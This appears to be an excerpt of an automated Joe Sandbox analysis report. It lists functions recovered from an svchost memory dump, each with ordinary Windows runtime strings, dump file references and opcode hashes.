                                                                                                                                • Instruction ID: e15e8349c99538906671635299c9f46b04edf7232c6ab606cd598cea6c1c52fd
                                                                                                                                • Opcode Fuzzy Hash: 29a9d5795890a3f69875482f8de69e19c90086437f3984da3d8e31f96fca459c
                                                                                                                                • Instruction Fuzzy Hash: 4A3185B0804B8C8ACB04DF90E884ADDFBB1FF44309F80415ED44ABF241DB39554ACB45
                                                                                                                                Function 0355F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035A02E7
                                                                                                                                • RTL: Re-Waiting, xrefs: 035A031E
                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035A02BD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                • Opcode ID: b0890b55a09e2c356123280ed92e4ca247d1c7635efe9bc57475c95ce100cd51
                                                                                                                                • Instruction ID: 996607c9cf1c8a8b0cc1f366992d9890f20b06b7fcc29fc1ad8f5f6498e55843
                                                                                                                                • Opcode Fuzzy Hash: b0890b55a09e2c356123280ed92e4ca247d1c7635efe9bc57475c95ce100cd51
                                                                                                                                • Instruction Fuzzy Hash: D3E1AD30614B41DFD724CF28E894B2AB7E4BF84314F184A5AF9A58B2F1D774E945CB82
                                                                                                                                Function 0356BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RTL: Resource at %p, xrefs: 035A7B8E
                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 035A7B7F
                                                                                                                                • RTL: Re-Waiting, xrefs: 035A7BAC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 0-871070163
                                                                                                                                • Opcode ID: 484851e7f91c7dc8d224f22419ed96e60e4cfd72355c38c448f354eb5474ffaf
                                                                                                                                • Instruction ID: 4ffa901796abf4111ed1101830993b978eb88aa0bd9ea1ffcac85e63781c905d
                                                                                                                                • Opcode Fuzzy Hash: 484851e7f91c7dc8d224f22419ed96e60e4cfd72355c38c448f354eb5474ffaf
                                                                                                                                • Instruction Fuzzy Hash: 1541E4353007069FD724DE69EC40B6AF7E9FF88710F140A2DE956DB6A0EB71E8058B91
                                                                                                                                Function 0356B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 035A728C
                                                                                                                                Strings
                                                                                                                                • RTL: Resource at %p, xrefs: 035A72A3
                                                                                                                                • RTL: Re-Waiting, xrefs: 035A72C1
                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 035A7294
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                • Opcode ID: 58e660390372ed924119729d12f7ebfdf04610fd6f76ec56548777584b97e25c
                                                                                                                                • Instruction ID: a2f5a284ef6d26892f8723677aa72b0eba7da80b07989e7cce11ab120af9eb2c
                                                                                                                                • Opcode Fuzzy Hash: 58e660390372ed924119729d12f7ebfdf04610fd6f76ec56548777584b97e25c
                                                                                                                                • Instruction Fuzzy Hash: 7941E135600606ABD720DE69EC41F6AB7B6FF88710F140A29F955EB260DB21E812D7D1
                                                                                                                                Function 035E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                • Opcode ID: 4002adacd750d5ac29d61a0d4d7bb45602d17df613c4d5bbf72de2a519dc5871
                                                                                                                                • Instruction ID: 55a1f13406e108fd1d0960a88b00f849e85144aa55e9e3d7dd263bd49d813f00
                                                                                                                                • Opcode Fuzzy Hash: 4002adacd750d5ac29d61a0d4d7bb45602d17df613c4d5bbf72de2a519dc5871
                                                                                                                                • Instruction Fuzzy Hash: 24316676A002199FDB24EF29EC40BEEB7BCFB44610F444956E849E7254EB309A448FA0
                                                                                                                                Function 03577D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-
                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                • Instruction ID: 98c82993e58af2e1058433f82f046f19b095697febd68c773b386de1f2d76932
                                                                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                • Instruction Fuzzy Hash: DE91A170E002169FDF24DE69F981ABEB7B5FF88320F58455AEC65E72E0E73099418B50
                                                                                                                                Function 03539126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$@
                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                • Opcode ID: 45f012babebe3db10ec301d992a0fc5be2643d0ee2d53b0f300d97a3ced99c71
                                                                                                                                • Instruction ID: 0507b68d76dd675cc5941cafbec1a74bdf2af06b0945adc460446c8e8153e10f
                                                                                                                                • Opcode Fuzzy Hash: 45f012babebe3db10ec301d992a0fc5be2643d0ee2d53b0f300d97a3ced99c71
                                                                                                                                • Instruction Fuzzy Hash: CD8139B6D002699BDB35DF54DC44BEAB7B8BB48710F0445EAA909B7290D7709E80CFA0
                                                                                                                                Function 035BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 035BCFBD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.4578288842.0000000003629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_3500000_svchost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallFilterFunc@8
                                                                                                                                • String ID: @$@4Cw@4Cw
                                                                                                                                • API String ID: 4062629308-3101775584
                                                                                                                                • Opcode ID: a00eb4a157130350bbe631c2d7dbee17c9b1b0bc6cb84d209e78ae0dce3fee85
                                                                                                                                • Instruction ID: 046a01a550000726dc465224a85ab09fdfb9e1e9b3cce1066647aeae053dae43
                                                                                                                                • Opcode Fuzzy Hash: a00eb4a157130350bbe631c2d7dbee17c9b1b0bc6cb84d209e78ae0dce3fee85
                                                                                                                                • Instruction Fuzzy Hash: 7041C179A00629DFCB21DFA5E840AADBBF8FF85704F15446AE910DF264E734C801CB64